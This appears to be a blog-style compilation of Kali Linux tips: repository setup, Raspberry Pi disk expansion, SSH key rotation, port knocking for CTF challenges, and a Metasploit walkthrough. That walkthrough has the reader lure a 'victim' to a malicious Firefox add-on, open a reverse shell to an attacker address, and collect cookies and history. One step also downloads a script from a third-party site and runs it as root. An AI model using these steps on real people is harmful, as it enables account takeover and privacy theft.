
Update Kali Linux Repositories

Getting errors when updating? Check your /etc/apt/sources.list: the release that was labeled “kali” in the repository lines is now “sana”. Replace the existing entries or add:

# Regular repositories
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free

# Source repositories
deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free

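Afterwards you may have to import the repository signing key into your apt keyring. The command below fetches the key by its short ID from a public keyserver, so confirm the full fingerprint of the imported key against the one Kali publishes before trusting it: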

apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6

Success.


Raspberry Pi with Kali 2.0 and Expand SD Drive Space

Have extra space on your micro SD card but are not seeing it? No big deal, simply run the commands below to expand your drive space.

root@kali:~# df -h

Filesystem      Size  Used Avail Use% Mounted on
rootfs          2.9G  1.5G  1.2G  56% /
/dev/root       2.9G  1.5G  1.2G  56% /
devtmpfs        460M     0  460M   0% /dev
tmpfs            93M  468K   93M   1% /run
tmpfs           5.0M     0  5.0M   0% /run/lock
tmpfs           186M     0  186M   0% /run/shm

Note in the output above that only 1.2G of space is available.

root@kali:~# wget http://www.alexrams.com/blog/wp-content/uploads/2015/11/raspi-expand-rootfs.sh
root@kali:~# fdisk -l
Disk /dev/mmcblk0: 28.8 GiB, 30908350464 bytes, 60367872 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x000cdbaa

Device         Boot  Start      End  Sectors  Size Id Type
/dev/mmcblk0p1           1   125000   125000   61M  c W95 FAT32 (LBA)
/dev/mmcblk0p2      125001 60366847 60241847 28.7G 83 Linux

In the fdisk -l output, the starting sector of partition 2 will most likely be “125001”. The script provided above has already been adjusted for that value.

root@kali:~# chmod +x raspi-expand-rootfs.sh
root@kali:~# sh raspi-expand-rootfs.sh
root@kali:~# df -h
Filesystem      Size  Used Avail Use% Mounted on
/dev/root        29G  4.4G   23G  17% /
devtmpfs        369M     0  369M   0% /dev
tmpfs           373M     0  373M   0% /dev/shm
tmpfs           373M  5.5M  367M   2% /run
tmpfs           5.0M     0  5.0M   0% /run/lock
tmpfs           373M     0  373M   0% /sys/fs/cgroup
tmpfs            75M  4.0K   75M   1% /run/user/0
tmpfs            75M  4.0K   75M   1% /run/user/110
tmpfs            75M     0   75M   0% /run/user/1000

root@kali:~# reboot

How to Change Your Kali Default SSH Keys

Quick guide to replacing the already generated SSH host keys that ship with Kali. First, move the default Kali SSH keys to a new folder:

cd /etc/ssh/
mkdir default_kali_keys
mv ssh_host_* default_kali_keys/

Next, regenerate the SSH keys:

dpkg-reconfigure openssh-server

Lastly, verify SSH key hashes are different:

md5sum ssh_host_*
md5sum default_kali_keys/*
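
The md5sum comparison above has to be read by eye. As an added example (not part of the original post), the function below compares the key material in each public host key against the copy in default_kali_keys and reports any key that is unchanged or was never regenerated; the function name check_host_keys is hypothetical.

```shell
#!/bin/sh
# Added example: confirm every regenerated SSH host key differs from the
# default set that was moved aside. Only the base64 key blob (field 2 of
# the .pub file) is compared, so a changed comment alone does not count.

# check_host_keys NEW_DIR OLD_DIR
# Prints one status line per public key and returns:
#   0  every old key has a regenerated counterpart with different material
#   1  at least one key is unchanged, missing, or no old keys were found
check_host_keys() {
    new_dir=$1
    old_dir=$2
    status=0
    for old in "$old_dir"/ssh_host_*_key.pub; do
        [ -e "$old" ] || { echo "no old keys found in $old_dir"; return 1; }
        name=$(basename "$old")
        if [ ! -f "$new_dir/$name" ]; then
            echo "MISSING   $name"      # this key type was not regenerated
            status=1
            continue
        fi
        old_blob=$(awk '{print $2; exit}' "$old")
        new_blob=$(awk '{print $2; exit}' "$new_dir/$name")
        if [ "$old_blob" = "$new_blob" ]; then
            echo "UNCHANGED $name"      # still the default key
            status=1
        else
            echo "ROTATED   $name"
        fi
    done
    return $status
}

# Usage with the directories from the steps above:
#   check_host_keys /etc/ssh /etc/ssh/default_kali_keys
```
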

How to Get History and Cookies from Mozilla Firefox with Metasploit

Send the link of the server to the victim via chat, email or other social engineering technique. Once you have access to the victim's PC, simply run the post module to dump credentials.

msfconsole
use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set payload firefox/shell_reverse_tcp
set lhost 192.168.72.128
set uripath /
exploit

How to Collect History

use post/firefox/gather/history
set payload firefox/shell_reverse_tcp
set lhost 192.168.72.128
set session 1
exploit
loot

How to Collect Cookies

use post/firefox/gather/cookies
set payload firefox/shell_reverse_tcp
set lhost 192.168.72.128
set session 1
exploit
loot

Port Knocking with Knockd and Knock for National Cyber League (NCL)

From Wikipedia “In computer networking, port knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports. Once a correct sequence of connection attempts is received, the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specific port(s).”[1]

Install the Knockd Service and Client

sudo apt-get install knockd

A challenge may include using the knock client and the default knockd sequence to open new port(s). It is recommended that you first scan the host with nmap -sV -p- -T5 [ipaddress]. This will show the currently open port(s) and service/version information. Then try the knockd default sequence: knock -v [ipaddress] 7000 8000 9000.

There will be no immediate indication that a port has opened after knocking, as you will have to re-scan and compare to find the new open port. More than likely there is a time limit on how long the new port will stay open and available for access.

PROTIP: You may have to use “wget” to extract the flag. The command wget --no-check-certificate https://webaddress:port might extract the page hosted on the open port.

KnockdEfault Evaluator v1.1 – knock-knock

The two tools in this package are knockdefault.py and knockd_on-off.py. The first of these is a scanner to identify default configs and the latter is a utility to interact with identified vulnerable services.[2]

root@kali:~# git clone https://github.com/hack1thu7ch/knock-knock.git
root@kali:~# cd knock-knock/
root@kali:~# ./setup.sh
root@kali:~# ./knockdefault.py
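
On the server side, the same default-sequence problem can be caught by auditing the knockd configuration itself. The function below is an added example, not part of the original post or of knock-knock: it flags any section still using 7000,8000,9000. The reversed close sequence 9000,8000,7000, the function names and the sample config are assumptions made for this example, as is the usual Debian path /etc/knockd.conf.

```shell
#!/bin/sh
# Added example: flag knockd.conf sections that still use a stock sequence.

# audit_knockd_conf FILE
# Prints "DEFAULT <section> <sequence>" for each offending section.
# Returns 1 if any default sequence was found, 0 otherwise.
audit_knockd_conf() {
    awk '
        /^[ \t]*\[/ {                       # section header, e.g. [openSSH]
            s = $0
            gsub(/[ \t]/, "", s)
            gsub(/\[|\]/, "", s)
            section = s
            next
        }
        tolower($0) ~ /^[ \t]*sequence[ \t]*=/ {
            seq = $0
            sub(/^[^=]*=/, "", seq)         # keep the value only
            gsub(/[ \t]/, "", seq)
            gsub(/:tcp/, "", seq)           # normalise 7000:tcp to 7000
            if (seq == "7000,8000,9000" || seq == "9000,8000,7000") {
                print "DEFAULT", section, seq
                found = 1
            }
        }
        END { exit found + 0 }
    ' "$1"
}

# Constructed sample config for trying the function (not from a real host).
sample_conf() {
    cat <<'EOF'
[options]
    UseSyslog

[openSSH]
    sequence    = 7000,8000,9000
    seq_timeout = 5
    tcpflags    = syn

[openWeb]
    sequence    = 4312:tcp,9115:tcp,2207:tcp
    seq_timeout = 5
    tcpflags    = syn
EOF
}

# Usage on a server: audit_knockd_conf /etc/knockd.conf
```
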

 

Web Citations:
[1] http://en.wikipedia.org/wiki/Port_knocking
[2] http://www.shortbus.ninja/default-knockd-cloaking-configurations/